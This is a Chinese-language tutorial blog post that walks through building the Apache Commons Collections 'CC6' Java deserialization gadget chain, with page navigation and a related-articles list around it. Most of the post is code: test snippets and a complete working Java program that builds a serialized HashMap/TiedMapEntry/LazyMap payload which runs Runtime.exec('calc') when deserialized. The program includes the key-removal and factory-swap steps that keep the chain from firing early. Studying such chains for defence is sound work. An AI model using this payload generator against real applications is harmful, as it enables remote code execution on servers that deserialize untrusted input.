当前位置: 首页 > news >正文

java反序列化commons-collections链6

news 来源:原创 2025/5/13 13:55:03
  • cc链6,最好用的cc链,因为它不受jdk版本的限制和cc版本的限制,前半段很像urldns链,后半段是cc1链

先来看一下它的利用链

	Gadget chain:java.io.ObjectInputStream.readObject()java.util.HashSet.readObject()java.util.HashMap.put()java.util.HashMap.hash()org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()org.apache.commons.collections.map.LazyMap.get()org.apache.commons.collections.functors.ChainedTransformer.transform()org.apache.commons.collections.functors.InvokerTransformer.transform()java.lang.reflect.Method.invoke()java.lang.Runtime.exec()

我们回忆找cc链的过程,在控制好ChainedTransformer实现任意调用后,我们需要找到一个类,使其调用transform()方法,在cc1链中,我们选择了TransformedMap方法,而这一次则要使用LazyMap方法

image-20250512204157490

如果传入的map不包含key的话,LazyMap的get方法可以调用transform(),

image-20250512204410196

我们新建一个map和lazymap,并调用其get方法,测试链子能不能打通,显然是可以的

public class CC6 {public static void main(String[] args) {Transformer[] transformers=new Transformer[]{new ConstantTransformer(Runtime.class),new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}),};ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);Map<Object,Object> hashmap=new HashMap<>();Map lazymap= LazyMap.decorate(hashmap,chainedTransformer);lazymap.get("aaa");}
}

接着向上找,看看什么东西用了get方法,但结果太多了,我们的利用点在

org.apache.commons.collections.keyvalue.TiedMapEntry

发现它的getvalue函数用到get方法

public Object getValue() {return map.get(key);
}

同时它的hashcode方法用到getvalue方法

public int hashCode() {Object value = getValue();return (getKey() == null ? 0 : getKey().hashCode()) ^(value == null ? 0 : value.hashCode()); 
}

这里我们测试一下用这个类的hashcode方法能不能打通

image-20250512210527943

已经拿到hashcode方法,就可以和urldns的前半条链重合在一起了,进入HashMap类,看到hash方法

static final int hash(Object key) {int h;return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}

hash方法在HashMap的readObject方法中被调用

image-20250512211506325

所以我们只需要传入的key是TiedMapEntry即可

hashmap.put(tiedMapEntry,"lally");
serialize(hashmap);
unserialize("ser6.bin");

但是到这里你以为就结束了吗?要注意put方法也会调用hash方法所以其实在反序列化之前我们的链子就已经被调用了,怎么解决这个问题呢,其实很简单,在put之前,我们将链子上任意一个类修改成用不着的,put完序列化之前再修改回来即可

image-20250512212256787

比如修改chainedTransformer,再通过lazymap将它改回来

image-20250512214205410

但是反序列化是还是不能正常,这是为什么呢,回忆一下,Lazymap的get方法调用的前提条件是什么?是map里没有key,而如果执行了put方法,就会把key放进去,导致反序列化不能正常进行,所以我们需要在put完之后将key删了

public Object get(Object key) {// create value for key if key is not currently in the mapif (map.containsKey(key) == false) {Object value = factory.transform(key);map.put(key, value);return value;}return map.get(key);
}

到此即可顺利执行,完整代码如下

package org.example;import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;public class CC6 {public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {Transformer[] transformers=new Transformer[]{new ConstantTransformer(Runtime.class),new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}),};ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);Map<Object,Object> hashmap=new HashMap<>();Map lazymap= LazyMap.decorate(hashmap,new ConstantTransformer(1));TiedMapEntry tiedMapEntry=new TiedMapEntry(lazymap,"key");Map<Object,Object> map=new HashMap<>();map.put(tiedMapEntry,"aaa");lazymap.remove("key");Class c=LazyMap.class;Field facrotyField=c.getDeclaredField("factory");facrotyField.setAccessible(true);facrotyField.set(lazymap,chainedTransformer);serialize(map);unserialize("ser6.bin");}public static void serialize(Object obj) throws IOException {ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser6.bin"));oos.writeObject(obj);}public static Object unserialize(String filename) throws IOException, ClassNotFoundException {ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename));return ois.readObject();}
}

相关文章:

  • LVGL(lv_switch开关)
  • 输出重定向
  • 位运算题目:黑板异或游戏
  • 牛客周赛 Round 92
  • ComfyUI的K采样器参数详解:实战演示
  • Python 实现失败重试功能的几种方法
  • 数据同步DataX任务在线演示
  • 部署Superset BI(六)Superset 的主机安装
  • LVGL(lv_list列表控件)
  • Linux服务器管理面板新选择:mdserver-web深度解析与使用指南
  • sqlilab-Less-18
  • CHIP第四次作业
  • Python笔记:windows下永久配置pip镜像源
  • 5.10-套接字通信 - C++
  • 算法题(145):货仓选址
  • SpringAI框架中的RAG模块详解及应用示例
  • Halcon案例(一):C#联合Halcon识别路由器上的散热孔
  • 定时器设计
  • python打包成exe
  • 中国古代史4
  • 国家林业和草原局原党组成员、副局长李春良接受审查调查
  • 秦洪看盘|预期改善,或迎来新的增量资金
  • 上海建筑领域绿色发展2025年工作要点发布
  • 西藏日喀则市拉孜县发生5.5级地震,震源深度10千米
  • 上海下周最高气温在30℃附近徘徊,夏天越来越近
  • 广州下调个人住房公积金贷款利率